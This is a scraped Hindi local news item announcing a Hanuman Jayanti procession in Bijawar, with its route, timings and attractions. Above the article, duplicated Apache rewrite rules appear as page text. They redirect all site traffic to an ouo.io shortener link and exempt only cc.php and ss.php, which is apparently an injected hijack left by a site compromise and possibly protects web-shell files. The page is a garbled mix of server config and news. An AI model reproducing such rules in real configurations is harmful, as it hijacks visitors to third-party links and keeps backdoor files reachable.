
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 705
Previous Nextबिजावर। श्री हनुमान जन्मोत्सव पर आज नगर में विशाल चल समारोह निकाला जाएगा। इस पर्व को धूमधाम से मनाने के लिए नगर के चप्पे चप्पे को भगवा रंग के ध्वज पताकाओं और झंडियों से सजाया गया है। करीब 12 साल पहले नगर के युवाओं द्वारा श्री हनुमान जयंती पर्व पर मात्र 4 दिन की तैयारी पर भव्य चल समारोह आयोजित किया गया था। यह चल समारोह श्री हनुमान जन्मोत्सव पर्व पर आसपास का सबसे बड़ा धार्मिक आयोजन है। श्री राम सेवा समिति द्वारा आयोजित यह धार्मिक आयोजन लोगों की आस्था , सेवा, समर्पण और सहयोग की अनूठी मिशाल बन गया है। इसमें हर वर्ग कि भागीदारी ने इसे भव्यता प्रदान की है। इसके तहत नगर में श्री राम नवमी पर्व से पुरानी नगर पंचायत के पास श्री राम दरबार सजाया गया। इस दौरान यहां रोजाना शाम को संगीतमयी आरती और भजन में एक साथ हजारों लोग झूमते नजर आते हैं। इस बार चल समारोह में महिला अखाड़ा के करतब आकर्षण के केंद्र रहेंगे। इसके साथ ही गले में अजगर डालकर तांडव करने वाले शंकर जी पर भी लोगों की निगाहें रहेंगी। साढ़े 12 बजे श्री हनुमान मंदिर मोहनगंज में आरती पूजा के बाद चल समारोह आरंभ होगा । इसके पहले सुबह वाहनों से प्रभात फेरी निकली जाएगी। चल समारोह का समापन श्री राम निवास मंदिर में होगा।